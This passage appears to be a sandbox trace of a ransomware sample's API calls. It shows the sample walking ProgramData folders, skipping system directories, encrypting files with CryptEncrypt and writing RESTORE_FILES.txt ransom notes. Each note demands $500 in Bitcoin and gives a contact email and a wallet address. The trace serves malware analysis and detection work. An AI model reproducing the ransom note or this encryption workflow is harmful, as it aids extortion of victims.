(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.456] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.456] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.456] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.456] CloseHandle (hObject=0xd4) returned 1 [0072.457] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.457] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.457] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 63 [0072.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.458] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.458] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.458] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.458] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.458] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.458] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.458] CloseHandle (hObject=0xb4) returned 1 [0072.459] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned 46 [0072.459] lstrcmpW (lpString1="MSScan", lpString2=".") returned 1 [0072.459] lstrcmpW (lpString1="MSScan", lpString2="..") returned 1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*") returned 48 [0072.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\.") returned 48 [0072.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.459] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\..") returned 49 [0072.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.459] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="Program Files (x86)") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="WelcomeScan.jpg", lpString2="System Volume Information") returned 1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 62 [0072.459] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch=".protected") returned 0x0 [0072.459] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0072.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.460] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.460] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.460] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.460] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt") returned 64 [0072.460] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.460] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.460] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.461] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.461] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.461] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.461] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.461] CloseHandle (hObject=0xb4) returned 1 [0072.461] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.461] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\RESTORE_FILES.txt") returned 57 [0072.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.462] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.462] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.463] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.463] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.463] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.463] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.463] CloseHandle (hObject=0xa4) returned 1 [0072.463] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Windows") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="Program Files (x86)") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="$Recycle.bin") returned 1 [0072.463] lstrcmpiW (lpString1="WwanSvc", lpString2="System Volume Information") returned 1 [0072.464] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned 36 [0072.464] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1 [0072.464] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1 [0072.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*") returned 38 [0072.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0072.464] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.464] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.464] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\.") returned 38 [0072.464] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.464] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0072.464] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0072.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.464] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.464] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.464] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\..") returned 39 [0072.465] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.465] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0072.465] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0072.465] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.465] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\.." (normalized: "c:\\programdata\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.465] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0072.465] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned 45 [0072.465] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0072.465] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0072.465] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*") returned 47 [0072.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.465] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.465] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\.") returned 47 [0072.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.465] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0072.465] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0072.465] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\..") returned 48 [0072.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.466] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0072.466] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0072.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\programdata\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 